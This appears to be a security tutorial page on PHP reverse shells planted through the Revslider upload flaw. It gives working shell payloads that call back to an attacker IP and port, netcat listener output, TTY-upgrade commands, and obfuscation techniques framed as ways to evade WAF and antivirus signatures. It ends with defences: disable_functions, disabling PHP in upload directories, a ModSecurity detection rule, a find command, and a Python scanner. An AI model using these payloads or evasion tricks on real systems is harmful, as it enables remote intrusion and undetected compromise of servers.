Reverse Shell in PHP

Between 2014 and 2017, the Revslider plugin for WordPress had a file upload vulnerability. Attackers uploaded a file named shell-316.php containing a simple reverse shell:

<?php
// Using backticks (which are identical to shell_exec)
$sock = fsockopen("10.0.0.1", 4444);
while ($cmd = fread($sock, 2048)) {
    $output = `$cmd`;      // run whatever the listener sends
    fwrite($sock, $output); // and send the output back over the same socket
}

On the attacker's machine a netcat listener on port 4444 receives the connection (the IP and port in the payload must match the listener), and the first command shows that the shell runs as the web server user:

listening on [any] 4444 ...
connect to [192.168.1.10] from target.com [10.0.0.5] 54321
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

A netcat shell is fragile: no job control, no tab completion, and Ctrl+C kills it. Upgrade it to a full TTY:

python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then press Ctrl+Z to background the shell, and on the attacker side run:
stty raw -echo; fg
export TERM=xterm

Evading Signatures

Modern web application firewalls (WAFs) and antivirus scanners look for known signatures such as fsockopen, shell_exec and system(). To bypass detection, you must obfuscate the payload so that these names never appear literally in the uploaded file.

Technique 1: String Concatenation & Encoding

PHP lets you call a function through a variable that holds its name, so the name can be assembled at run time. Here the function name is split in two and the IP address is built from chr() calls (shell_exec is still literal in this version; the same trick applies to it):

<?php
$c1 = "fso";
$c2 = "ckopen";
// chr() builds "192.168.1.10" without the literal string appearing in the file
$ip = chr(49).chr(57).chr(50).".".chr(49).chr(54).chr(56).".".chr(49).".".chr(49).chr(48);
$port = 4444;
$fn = $c1.$c2;            // "fsockopen"
$sock = $fn($ip, $port);  // variable function call
while ($cmd = fread($sock, 2048)) {
    $out = shell_exec($cmd);
    fwrite($sock, $out);
}

Technique 2: XOR-Derived Function Names

XOR two strings to produce the function name dynamically, so neither operand on its own looks like a function name to a scanner.

Technique 3: Hand the Socket to proc_open

A variant that needs neither shell_exec nor backticks opens a persistent socket and wires it to an interactive /bin/sh as stdin, stdout and stderr:

<?php
$sock = pfsockopen("192.168.1.10", 4444);
$proc = proc_open("/bin/sh -i", [0=>$sock, 1=>$sock, 2=>$sock], $pipes);
?>

Or using mail() with a malicious sendmail parameter (CVE-2016-10033 style) is old but possible.

Defense

For system administrators and blue teams, understanding the attack is essential for defense.

1. Disable Dangerous PHP Functions

Edit php.ini and add the execution and socket primitives used above (shell_exec, system, proc_open and the rest of the exec family) to disable_functions. This is a global setting, so weigh it against legitimate code that needs those functions.

2. Never Execute Uploads as PHP

Never allow user uploads to be executed as PHP. In the Apache configuration:

<Directory "/var/www/html/uploads">
    php_flag engine off
    AddType text/plain .php .phtml .php5
</Directory>

Two caveats: a <Directory> block is only valid in the main server configuration, not in .htaccess, so inside an .htaccess file in uploads/ put the two directives on their own. And php_flag is honoured only by mod_php; under PHP-FPM the engine is not in Apache, so deny access to those extensions or unmap their handler instead. Storing uploads outside the web root avoids the problem entirely.

3. Catch the Pattern with ModSecurity

ModSecurity rules can catch the pattern (REQUEST_BODY is available from phase 2):

SecRule REQUEST_FILENAME "\.php$" "chain,phase:2,deny,id:10001"
    SecRule REQUEST_BODY|ARGS "(fsockopen|pfsockopen|shell_exec|system|`.*`)" "t:lowercase"

Note that for multipart/form-data uploads the file content is not part of REQUEST_BODY; inspect the uploaded file itself (FILES_TMP_CONTENT in ModSecurity 2.9 and later). The bare word system also matches innocent text such as "ecosystem", and a literal-name signature like this is exactly what Technique 1 defeats.

4. Hunt for Recently Written PHP Files

List PHP files under the web root modified in the last 24 hours; a web shell dropped through an upload bug shows up here even if it slipped past the WAF. Check -ctime as well, since touch can reset mtime but not ctime:

find /var/www/html -name "*.php" -mtime -1 -ls
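The ModSecurity rule above and the obfuscation in Technique 1 are two sides of one problem: a signature that matches literal names is defeated by chr() and string concatenation. The scanner below is an added example written for this page, not code from the article or from ModSecurity. It normalises those two tricks before matching, reports which shell primitives a PHP file can reach, and (for section 1) audits a php.ini disable_functions line. All inputs are constructed here: the article's three shells, one benign upload handler and two php.ini fragments. The names exec, passthru and popen in DANGEROUS are my addition to the functions the article lists.

```python
import re

# Primitives the article's shells use (fsockopen, pfsockopen, shell_exec,
# system, proc_open, backticks); exec, passthru and popen are my addition.
DANGEROUS = {"fsockopen", "pfsockopen", "shell_exec", "system", "exec",
             "passthru", "proc_open", "popen"}

CHR_RE = re.compile(r"chr\(\s*(\d+)\s*\)")               # chr(49) -> "1"
JOIN_RE = re.compile(r'"\s*\.\s*"')                      # "fso"."ckopen" -> "fsockopen"
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*"([^"]*)"\s*;')   # $c1 = "fso";
CALL_RE = re.compile(r'(?<![\w$])"?(\w+)"?\s*\(')        # name( or "name"(
BACKTICK_RE = re.compile(r"`[^`\n]*`")                    # `$cmd`
DISABLE_RE = re.compile(r"^\s*disable_functions[ \t]*=[ \t]*(.*)$", re.M)


def deobfuscate(src, max_rounds=10):
    """Undo the Technique 1 tricks: turn chr() into quoted characters, fold
    "a"."b" into "ab", and inline variables that hold a plain string literal,
    so $fn($ip, $port) becomes "fsockopen"("192.168.1.10", $port).
    Rounds repeat until nothing changes; max_rounds bounds pathological input."""
    src = CHR_RE.sub(lambda m: '"' + chr(int(m.group(1)) % 256) + '"', src)
    for _ in range(max_rounds):
        before = src
        src = JOIN_RE.sub("", src)
        for name, value in ASSIGN_RE.findall(src):
            # replace uses of $name but not its own assignment ($name = ...)
            pattern = r"\$" + re.escape(name) + r"\b(?!\s*=[^=])"
            src = re.sub(pattern, lambda m, v=value: '"' + v + '"', src)
        if src == before:
            break
    return src


def find_primitives(src):
    """Return the dangerous primitives a PHP file can reach after
    de-obfuscation; backtick execution is reported as 'backtick'."""
    norm = deobfuscate(src)
    found = {m.group(1) for m in CALL_RE.finditer(norm)} & DANGEROUS
    if BACKTICK_RE.search(norm):
        found.add("backtick")
    return found


def still_enabled(php_ini):
    """Parse disable_functions from php.ini text and report which of the
    primitives above remain callable (all of them if the line is absent)."""
    m = DISABLE_RE.search(php_ini)
    disabled = set()
    if m:
        disabled = {f.strip(" '\"") for f in m.group(1).split(",") if f.strip()}
    return DANGEROUS - disabled


# Constructed samples: the article's shells (the obfuscated one with its
# $fn = $c1.$c2 call spelled out) and a benign upload handler.
SHELL_PLAIN = '''<?php
$sock = fsockopen("10.0.0.1", 4444);
while ($cmd = fread($sock, 2048)) { $output = `$cmd`; fwrite($sock, $output); }
'''
SHELL_OBFUSCATED = '''<?php
$c1 = "fso"; $c2 = "ckopen";
$ip = chr(49).chr(57).chr(50).".".chr(49).chr(54).chr(56).".".chr(49).".".chr(49).chr(48);
$port = 4444;
$fn = $c1.$c2;
$sock = $fn($ip, $port);
while ($cmd = fread($sock, 2048)) { $out = shell_exec($cmd); fwrite($sock, $out); }
'''
SHELL_PROC = '''<?php
$sock = pfsockopen("192.168.1.10", 4444);
$proc = proc_open("/bin/sh -i", [0=>$sock, 1=>$sock, 2=>$sock], $pipes);
?>'''
BENIGN = '''<?php
$name = basename($_FILES["f"]["name"]);
move_uploaded_file($_FILES["f"]["tmp_name"], "/var/www/html/uploads/" . $name);
'''
# Constructed php.ini fragments: stock (nothing disabled) and hardened.
WEAK_INI = "; stock php.ini: nothing disabled\ndisable_functions =\n"
HARDENED_INI = ("disable_functions = exec,passthru,shell_exec,system,"
                "proc_open,popen,pfsockopen,fsockopen\n")

if __name__ == "__main__":
    for label, src in [("plain", SHELL_PLAIN), ("obfuscated", SHELL_OBFUSCATED),
                       ("proc_open", SHELL_PROC), ("benign", BENIGN)]:
        print(f"{label:11s} -> {sorted(find_primitives(src))}")
    print("still enabled (weak):", sorted(still_enabled(WEAK_INI)))
    print("still enabled (hard):", sorted(still_enabled(HARDENED_INI)))
```

The scanner is static and regex-based: it recovers what Technique 1 hides but would not see a name produced by XOR, eval() of a decoded blob, or a function reached through a string returned by another call. Use it on the files the find command above turns up, not as a replacement for php_flag engine off in the upload directory.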